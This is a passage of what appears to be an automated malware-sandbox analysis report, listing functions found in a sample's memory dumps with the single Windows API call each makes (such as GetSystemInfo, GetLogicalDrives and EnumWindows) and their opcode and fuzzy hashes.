                                                        • Instruction ID: fc9a2ce3b55544d5305fd19d479a5c5df38ac99266da85d4f88fca244675f515
                                                        • Opcode Fuzzy Hash: dd352345c22615b2722ef2cf777d9ce09cb80429f34029785c6024f3d4964feb
                                                        • Instruction Fuzzy Hash: CB11C4755043809FDB128F15DC89B96FFE4EF06220F0884EEED498B252D239A404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 8bdaf8f7aeeea5f065762c30c8f42f14887634b063895420b33420f25bc44d81
                                                        • Instruction ID: e99a92049a9781e80b5c72a15b57b5c37a4676cd0204736e39cf3694af9ce6f8
                                                        • Opcode Fuzzy Hash: 8bdaf8f7aeeea5f065762c30c8f42f14887634b063895420b33420f25bc44d81
                                                        • Instruction Fuzzy Hash: B2118F715093C09FE7128B15DC54B62BFB4DF47624F0880CAEDC44F253D265A808DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028305E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02830640
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 46c769883042ea80c62f4e01c056e12fbb46560c3327cf4e0744c1e81a07d654
                                                        • Instruction ID: e45a06b68d779a82c85fcb4372421569e3b964f88396b13b2ba5974ad6b41049
                                                        • Opcode Fuzzy Hash: 46c769883042ea80c62f4e01c056e12fbb46560c3327cf4e0744c1e81a07d654
                                                        • Instruction Fuzzy Hash: D311C2765093C09FDB128B15DC95B52FFB4DF43224F0880DBED898B663D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0283092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0283099C
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 6e12f1c682ccc31a09e2645baf4ab8dade041edc26ccbc370a4802f7f8f40cfb
                                                        • Instruction ID: ebdbbe1c2a3e85be52c3330d169062dcf8f785178a48b23a180a2a7a195065dc
                                                        • Opcode Fuzzy Hash: 6e12f1c682ccc31a09e2645baf4ab8dade041edc26ccbc370a4802f7f8f40cfb
                                                        • Instruction Fuzzy Hash: 471190754093C09FE713CB25DC55B92BFA4EF07324F0980DADD888B163C265A908CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 020DAA71
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 6226a5ee179d779df1373d7aa01869d5ad6e10965967db48284c8e9c066af47f
                                                        • Instruction ID: 8b43ab9c9e7a88b1be3acaa5709477c9a6236feb0583dc5d296b7a99fa313c1e
                                                        • Opcode Fuzzy Hash: 6226a5ee179d779df1373d7aa01869d5ad6e10965967db48284c8e9c066af47f
                                                        • Instruction Fuzzy Hash: 5E1191755097C09FD7128B15DC85B92BFA4EF03224F0980DBDD858F163D269A909DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020DAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 50ca0da809823d5900ec179619296f4cc79b98626b209aa6049425f4042fe24b
                                                        • Instruction ID: 1c4585a200553019c6c9e13486f2b4d4ff7af4456f940061b813e991a2a45605
                                                        • Opcode Fuzzy Hash: 50ca0da809823d5900ec179619296f4cc79b98626b209aa6049425f4042fe24b
                                                        • Instruction Fuzzy Hash: 5E115EB2A013009FEB61DF29DC85B56FBE8EF05621F08C46AED09CB642D775E404DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028307C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 02830819
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 5c93083e5a778ebd6c4a0ff8f9c57891e60dbd4ff21af0153940f9013b718f9f
                                                        • Instruction ID: 6f498b6a480d517becdfceb489efdd1ee8ae006870c4ae1b4ca462932fb413c5
                                                        • Opcode Fuzzy Hash: 5c93083e5a778ebd6c4a0ff8f9c57891e60dbd4ff21af0153940f9013b718f9f
                                                        • Instruction Fuzzy Hash: 0C01CC7A500304EFFB219F05DC85BA6FB98DF44725F14C4AAED089A281D674A904CAE2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028313AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 7336a32852535c46193928a32b3ad5082e71cc098c198f86682757ca00e6b3da
                                                        • Instruction ID: 3a3fbcbf01516f8ac8252142408c5048a35160d50c8c93dc5f6f38c8af241041
                                                        • Opcode Fuzzy Hash: 7336a32852535c46193928a32b3ad5082e71cc098c198f86682757ca00e6b3da
                                                        • Instruction Fuzzy Hash: D7118E7A500700DFEB21CF56DC89B66FBA4EF04621F08C4AADD49CB651D375E414CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 020DABC9
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 2d814640fa9cbc77b816b29d30980a005d07bdd74090f1a3a20c3a1266af02ea
                                                        • Instruction ID: e08e6c13dbe2f2917c0a7054eae196e9aa10aa0de47c9d66f65f84fcbc61ad3c
                                                        • Opcode Fuzzy Hash: 2d814640fa9cbc77b816b29d30980a005d07bdd74090f1a3a20c3a1266af02ea
                                                        • Instruction Fuzzy Hash: ED118EB65093809FDB11CF65DC85B92BFE4EF42324F0984ABDD488F253D275A508CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 020DBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 99877412c9e2775de4d88b01a9549e66939738c48df57dce90e53472564ec254
                                                        • Instruction ID: ceed78a7dec4594c48c1147c5934b11160769ce28ff41865131252c51aa4430d
                                                        • Opcode Fuzzy Hash: 99877412c9e2775de4d88b01a9549e66939738c48df57dce90e53472564ec254
                                                        • Instruction Fuzzy Hash: 8711A172500700DFDB21CF59DC85B56FBE4EF04315F0884AADD498A612D371E414EB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028301D0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 7a6bc5b59f9ad57e31860d350a586b6db72efae580aa555ced695dd6238945fb
                                                        • Instruction ID: aecce35e0468ec06b2b7a7664089c1ef4a11304d71fb945caf038241cf33430e
                                                        • Opcode Fuzzy Hash: 7a6bc5b59f9ad57e31860d350a586b6db72efae580aa555ced695dd6238945fb
                                                        • Instruction Fuzzy Hash: AD019E796003049FEB11DF6ADC8576AFBD8EB01225F08C4AADC09CB642D774E404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0283104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0283109E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 83d4b26b5e6c3a523d6eec9e7fb70025a6566fe00a6d88e94c315954fcd40531
                                                        • Instruction ID: 352d2824ff1369bedab28b76278547e43ebcff0dfe170ba774701b7933fc5375
                                                        • Opcode Fuzzy Hash: 83d4b26b5e6c3a523d6eec9e7fb70025a6566fe00a6d88e94c315954fcd40531
                                                        • Instruction Fuzzy Hash: BD017171900600ABE310DF16DC86B66FBA8FB84B20F14816AED089B741D235F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 020DA23E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: 14ffe9c481bd7547c9c96532c49b92549f3d42c414829af441cf7e038f4c9063
                                                        • Instruction ID: f2695e6bea2ed2fb9cb5dbe9fe219e5fae449217593f508519d64610b2d1e03b
                                                        • Opcode Fuzzy Hash: 14ffe9c481bd7547c9c96532c49b92549f3d42c414829af441cf7e038f4c9063
                                                        • Instruction Fuzzy Hash: F4017171900600ABE310DF16DC86B66FBA8FB84A20F14816AED089B741D235F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028312FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0283132F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 957325bc3742754e2a1650cf55451827a65b4bee1d6f0c6fb0fb9a0c82981fce
                                                        • Instruction ID: 99c64f531ca333db35c4f98d9aedc6e4946af6ddd02c17419219a45f6425fb54
                                                        • Opcode Fuzzy Hash: 957325bc3742754e2a1650cf55451827a65b4bee1d6f0c6fb0fb9a0c82981fce
                                                        • Instruction Fuzzy Hash: CA01BC79900300DFEF218F19D8897A5FBA4EF05A21F08C4AADC0DCB642D679A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 020DBB2F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 7d912a85b30fbad090b16b15dd2e480a1b59aede938e2a0c10abce1fdbf7bc7f
                                                        • Instruction ID: 1b8129dd4e9559dbe94d46b60e98b9c92573dd710259b4ac040bdc7764b6ae75
                                                        • Opcode Fuzzy Hash: 7d912a85b30fbad090b16b15dd2e480a1b59aede938e2a0c10abce1fdbf7bc7f
                                                        • Instruction Fuzzy Hash: 5B01DF71901300DFEB21CF15DC857A9FBE4EF05625F08C4AADD098B256D2B5E804DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028304B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02830502
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 9499ee2a3a772886c823d7cfe85918a10054dc591518bd2be1b19ee8b7f192b7
                                                        • Instruction ID: fa71de6b9c154426ebda83cd0435ed41606a91eb055b1c6c5c4cc2ac0c62e060
                                                        • Opcode Fuzzy Hash: 9499ee2a3a772886c823d7cfe85918a10054dc591518bd2be1b19ee8b7f192b7
                                                        • Instruction Fuzzy Hash: 9A016271900601ABD310DF16DC86B26FBA4FB89B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02830FB0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 198f64e02bbf52d8d03daddb8bda1d5036210d2d4dca9eb19f3fb8e8804f18f8
                                                        • Instruction ID: c99c01ff42ec8e6aabf22e1766d552b61b2c7b2f82ff6e5122b24f7596c8a1d2
                                                        • Opcode Fuzzy Hash: 198f64e02bbf52d8d03daddb8bda1d5036210d2d4dca9eb19f3fb8e8804f18f8
                                                        • Instruction Fuzzy Hash: 1F017C79504344DFEB11DF55D885B66FBD4EB00625F08C4AADC08CF686D375E404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 020DA94A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: f689ec0c357147e3b585caf3111ef9280758e0579c5e41d889b0f577745cfa7e
                                                        • Instruction ID: 70877217ceb649b9ad80683f27f714ee57337e98e91b312e58273d94f3ad282e
                                                        • Opcode Fuzzy Hash: f689ec0c357147e3b585caf3111ef9280758e0579c5e41d889b0f577745cfa7e
                                                        • Instruction Fuzzy Hash: 97016271900601ABD310DF16DC86B26FBA4FB89B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0283060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02830640
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 58ab9b6d30bcb1f8e2e1b77b9b436ae825a4d50e09e3fcbf9f882c085e23d97c
                                                        • Instruction ID: 4de16f3f6ecd72aab9fdd26837c12888ab27f1f02ecd5b40c6233c5942c4b3e2
                                                        • Opcode Fuzzy Hash: 58ab9b6d30bcb1f8e2e1b77b9b436ae825a4d50e09e3fcbf9f882c085e23d97c
                                                        • Instruction Fuzzy Hash: E601F479500704CFEB218F15DC85761FBA4DF41725F08C0AADC098B756E375E404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 020DABC9
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 3156d93d3d3c8e0284203d6795e696249dd5a315c3197ef6cb2385f350c4de93
                                                        • Instruction ID: 24775dc24b4a1286b3c262c3ca26766f7f1ec7af81157c0b7f9aea9acf6d40c1
                                                        • Opcode Fuzzy Hash: 3156d93d3d3c8e0284203d6795e696249dd5a315c3197ef6cb2385f350c4de93
                                                        • Instruction Fuzzy Hash: 7601DC31605340DFEB10DF5ADC89BA5FBE4EF00231F08C4AADD088F202D279A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02831116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02831148
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: c16a96eb7c22eb389dc8f46b77511a4eb6f85834abfffaa3aa6f9f62541d3bc6
                                                        • Instruction ID: 8343f9f0af8a677f02ede13049494370013adf725e503935fafbee00a8915ef2
                                                        • Opcode Fuzzy Hash: c16a96eb7c22eb389dc8f46b77511a4eb6f85834abfffaa3aa6f9f62541d3bc6
                                                        • Instruction Fuzzy Hash: ADF0FF39500744DFEB22CF05D8897A9FBA0EF05A26F08C09ACC0C8B312C679A444CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0283096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0283099C
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: e6aa8f06214852c3b8f6a290b5ad1d0fdb70688c652232180e82e664c7789d24
                                                        • Instruction ID: 5ab1a11c800285781d561ba8cc3f335a2ef1f8da6bf1a970fe04382f7bea8312
                                                        • Opcode Fuzzy Hash: e6aa8f06214852c3b8f6a290b5ad1d0fdb70688c652232180e82e664c7789d24
                                                        • Instruction Fuzzy Hash: C2F0CD39904744DFEB21DF06D889766FBA0EF15726F08C09ADD498B316D375A408CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 4b86d6d2611fe297e553932d7e471e9df742d1efabec29ec4a40012011243992
                                                        • Instruction ID: b8a5ead5d32f26efdf42fb2b735ddd808f653d6b88bd9f0d62594227a4968336
                                                        • Opcode Fuzzy Hash: 4b86d6d2611fe297e553932d7e471e9df742d1efabec29ec4a40012011243992
                                                        • Instruction Fuzzy Hash: D1F0A935A05740DFEB219F06D8C9769FBA1EF05721F08C09AED494B312D3B5E808DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 020DAA71
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 3e07e3e77ddb6861bf7b04c91be2301b2d8be2248525a831e8286679227cab32
                                                        • Instruction ID: 175b2b32d144b9e2d26334aadad636c8b817ab5c8aecf867aa9281174bc57e2a
                                                        • Opcode Fuzzy Hash: 3e07e3e77ddb6861bf7b04c91be2301b2d8be2248525a831e8286679227cab32
                                                        • Instruction Fuzzy Hash: 89F0CD31601B40DFEB11CF1AD989762FBE0EF05621F48C19ADD094B242D379A504DFA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 020DA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 6a25650016aa45947fe72a4d13ca58f0b463e3bf70f239a9dfa6344f9e5c20a5
                                                        • Instruction ID: 16a4d6e172d6235324b9e13b144b04f24d366dda5ee89aeb12a68ceedd205132
                                                        • Opcode Fuzzy Hash: 6a25650016aa45947fe72a4d13ca58f0b463e3bf70f239a9dfa6344f9e5c20a5
                                                        • Instruction Fuzzy Hash: 4911A3715093809FD712CF25DC85B92FFE4DF42221F0980EBED498F252D275A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 020DA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 8b3485fc1c9a9a95be816acee7dee354ef457af98a47b03e445baf1e27456c57
                                                        • Instruction ID: 93ec2d1df662d49f635e3c2d366edeff348885404065bfa75241cff94ea258d3
                                                        • Opcode Fuzzy Hash: 8b3485fc1c9a9a95be816acee7dee354ef457af98a47b03e445baf1e27456c57
                                                        • Instruction Fuzzy Hash: 8D01DB71A01740CFEB20DF19D8897A6FBE4EF00221F08C0AADC098B246D375A804DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02850860, Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123348794.0000000002850000.00000040.00000040.sdmp, Offset: 02850000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d505199d78cb3bf6ddc23b6956def1c98e5ab4b1cf7187bc2d08306f297f4a48
                                                        • Instruction ID: b0614a538026a9055bb91d810ee1a74bf127d2000e6b3215d42335c40b749ff4
                                                        • Opcode Fuzzy Hash: d505199d78cb3bf6ddc23b6956def1c98e5ab4b1cf7187bc2d08306f297f4a48
                                                        • Instruction Fuzzy Hash: 90F0F47A50C3808FC7168F15EC51852BBA4DF46731B18C5FFDC49CB213D229A908CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028507F7, Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123348794.0000000002850000.00000040.00000040.sdmp, Offset: 02850000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7b3b5da7fb126db3a7e47ac6899135d1507f188aca6903caed44702c9badb4c3
                                                        • Instruction ID: 3f37d87aef17cb48e6428d5c89a8b89ab143835b92c74f8d48750890b0a8afd0
                                                        • Opcode Fuzzy Hash: 7b3b5da7fb126db3a7e47ac6899135d1507f188aca6903caed44702c9badb4c3
                                                        • Instruction Fuzzy Hash: C80186765097805FD7128F16EC41853FFE8DF8767070984ABEC898B222D129B919CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05710861, Relevance: .0, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2137300315.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 171b87991f48b98db4d6c61535b4d3df4b7f52bb256835d2acf18730ebb68aab
                                                        • Instruction ID: 55948bb3de7ff175ccbf865ac96120d67af525743f326373bd2a8466f2cf0299
                                                        • Opcode Fuzzy Hash: 171b87991f48b98db4d6c61535b4d3df4b7f52bb256835d2acf18730ebb68aab
                                                        • Instruction Fuzzy Hash: E8F0272260C3E09FC30347689C988857FB29D8721030A05DBD481CB19BDA185C81D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0285081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123348794.0000000002850000.00000040.00000040.sdmp, Offset: 02850000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7832fd3408ed861ed7a795cf32e9646cae85f6809265ac672a2f1520dc98bf9e
                                                        • Instruction ID: ae2fc690b0bcfae73ef86923f7bd6116fca279094faa90b151e1586686a8b331
                                                        • Opcode Fuzzy Hash: 7832fd3408ed861ed7a795cf32e9646cae85f6809265ac672a2f1520dc98bf9e
                                                        • Instruction Fuzzy Hash: 15E06D76A007008BD650CF0AEC81452F794EB84A31B18C06BDC0D8B700D136B5048BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020D23F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121236146.00000000020D2000.00000040.00000001.sdmp, Offset: 020D2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 596ccec85a26d999679e403452dbc788018f0911d01baccd70b6a68a16719815
                                                        • Instruction ID: e5a1b8bdb6fcd0f2fe14b66df5cc74b8af7584a10159d530f908d15dc7d8c65a
                                                        • Opcode Fuzzy Hash: 596ccec85a26d999679e403452dbc788018f0911d01baccd70b6a68a16719815
                                                        • Instruction Fuzzy Hash: 6AD05E79206B818FD7178A1CC1A4B9537D4AF55B08F4644F9EC40CB6A3C768F5D1E200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020D23BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121236146.00000000020D2000.00000040.00000001.sdmp, Offset: 020D2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfc77333cb6f865759b6b294918be96d968150e8e19e95befcb86fa16f1a66f9
                                                        • Instruction ID: 7648739f29dfb19ebf3df5eb552d7b1be768c8fa5b4035ef5fbe782b2faa6b92
                                                        • Opcode Fuzzy Hash: bfc77333cb6f865759b6b294918be96d968150e8e19e95befcb86fa16f1a66f9
